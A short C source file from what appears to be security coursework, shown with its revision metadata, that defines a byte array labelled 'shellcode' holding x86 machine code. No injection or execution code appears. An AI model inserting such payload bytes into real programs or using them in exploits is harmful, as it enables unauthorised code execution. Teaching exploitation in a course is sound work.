progs/o2.c
author cu
Sat, 28 Oct 2017 00:05:02 +0100
changeset 560 85521d542da4
parent 400 f05368d007dd
permissions -rw-r--r--
updated cw

char shellcode[] =
 "\x55\x89\xe5\x83\xec\x14\xc7\x45\xf8\xc0\x84\x04"
 "\x08\xc7\x45\xfc\x00\x00\x00\x00\x00\x8d\x55\xf8"
 "\x89\x54\x24\x04\x89\x04\x34\xe8\x02\xff\xff\xff"
 "\xc9\xc3";